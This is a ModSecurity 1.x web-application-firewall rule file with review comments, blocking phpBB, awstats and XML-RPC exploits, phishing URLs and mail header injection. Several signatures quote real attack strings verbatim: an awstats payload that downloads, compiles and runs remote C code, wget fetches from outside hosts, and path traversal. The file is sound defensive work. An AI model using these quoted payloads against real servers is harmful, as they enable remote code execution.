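# ModSecurity 1.x (SecFilter*) signature set.
# Rules without an explicit action list fall back to SecFilterDefaultAction,
# which is not set in this file; confirm it is defined (and that SecFilterEngine
# is enabled) wherever this file is included.
# NOTE(review): some patterns below are written URL-encoded (%20, %7c, %252e)
# and others decoded (spaces, quotes). Which form a request is compared in
# depends on the engine's decoding settings, so test each rule against a sample
# request and do not assume it fires.

# referer spam common sites
# NOTE(review): the alternation is unanchored, so it matches these strings
# anywhere in the Referer, including inside longer host names.
SecFilterSelective "HTTP_REFERER" "(go\.to|get\.to|drop\.to|hey\.to|switch\.to|dive\.to|move\.to|again\.at)"

# phpbb exploits
# Parentheses are escaped so they match literally. Unescaped they are regex
# groups, and the pattern would only match "chr101...", which never occurs in
# the encoded chr(NNN) sequences these signatures are written for.
SecFilterSelective THE_REQUEST "chr\(101\)%252echr\(99\)%252echr\(104\)"
SecFilterSelective THE_REQUEST "chr\(99\)%252echr\(100\)%252echr\(32\)"
SecFilterSelective THE_REQUEST "wget%20www.geocities.com/supahacker/bz.tgz"
SecFilterSelective THE_REQUEST "addnew&install_to=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./tmp"

# awstats exploit
# The first rule is an exact-payload signature; the second is the broader
# check for an encoded space followed by a pipe in the configdir parameter.
SecFilterSelective THE_REQUEST "configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20http%3a%2f%2fawsimple%2etripod%2ecom%2fm%2ftest%2ec%3bgcc%20%2do%20nfsiod%20test%2ec%3b%2e%2fnfsiod%3becho%20e_exp%3b%2500"
SecFilterSelective THE_REQUEST "configdir=%20%7c"

# Protect against phpBB2 Exploits
# Chained pair: the deny,log action applies only when both patterns match
# (a viewtopic.php request that also contains a chr(NNN) call).
SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"
# User-Agent strings are client-controlled, so this only catches tools that
# announce themselves.
SecFilterSelective HTTP_USER_AGENT "phpBB2 exploit"

# Exploit phpBB Highlighting Code Execution Attempt
SecFilterSelective THE_REQUEST "&highlight='\.system\("

# Exploit phpBB Highlighting SQL Injection
SecFilterSelective THE_REQUEST "&highlight='\.mysql_query\("

# Exploit phpBB Highlighting Code Execution - Santy.A Worm
SecFilterSelective THE_REQUEST "&highlight='\.fwrite\(fopen\("

# Exploit phpBB Highlight Exploit Attempt
# Matches the literal text %27 in the "highlight" argument.
# NOTE(review): presumably aimed at a double-encoded single quote that is still
# encoded after one round of decoding; confirm.
SecFilterSelective ARG_highlight %27

# .info DOS with fake majestic12 user agent (more info at http://www.majestic12.co.uk/projects/dsearch/mj12bot.php)
SecFilterSelective HTTP_USER_AGENT "v1\.0\.8.*majestic12\.co\.uk/bot\.php"

# Common web exploit
# Exact-string signatures: whitespace and command order must match as written,
# so a variant with different spacing is not covered by these three rules.
SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;wget "
SecFilterSelective THE_REQUEST "cmd=cd /tmp; wget "
SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;ls;wget "

# Specific XML-RPC attacks on xmlrpc.php
# Three-link chain: request for xmlrpc.php, AND "xml" in the request, AND a
# PHP function call from the list below. The last pattern must stay on one
# line; a line break inside the quoted regex breaks the directive.
# NOTE(review): in the second link the "<" is followed by "*", which makes it
# optional, so that link is effectively a substring test for "xml".
SecFilterSelective THE_REQUEST "/xmlrpc\.php" chain
SecFilter "\<*xml" chain
SecFilter "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

# block common phish site URLs
# NOTE(review): the dots in these patterns are unescaped and match any single
# character (e.g. "paypal.cgi-bin" also matches "paypal/cgi-bin"). That looks
# intentional; confirm before tightening.
SecFilterSelective THE_REQUEST "aw/eBayISAPI"
SecFilterSelective THE_REQUEST "paypal-login"
SecFilterSelective THE_REQUEST "paypalmembers"
SecFilterSelective THE_REQUEST "paypal.cgi-bin"
SecFilterSelective THE_REQUEST "secure.cgi.paypal.com"
SecFilterSelective THE_REQUEST "wellsfargo.cgi.bin"
SecFilterSelective THE_REQUEST "cgibin-webscr"
SecFilterSelective THE_REQUEST "signin.ebay.com"

# spammer bcc header injections
# POST_PAYLOAD is inspected only when request-body scanning is enabled
# (SecFilterScanPOST On), which is not set in this file; confirm it is set
# elsewhere.
# The pattern is broad: any POST body containing "bcc:" followed later by "@"
# matches, so legitimate mail forms may be blocked. Injection through other
# headers (To:, Cc:) is not covered by this rule.
SecFilterSelective POST_PAYLOAD "bcc:.*@.*"

# Additional rule sets, loaded after the rules above (contents not shown here).
Include /dh/apache2/template/etc/mod_sec_gotroot_exclude.conf
Include /dh/apache2/template/etc/mod_sec_gotroot_rootkits.conf
Include /dh/apache2/template/etc/mod_sec_gotroot_generic.conf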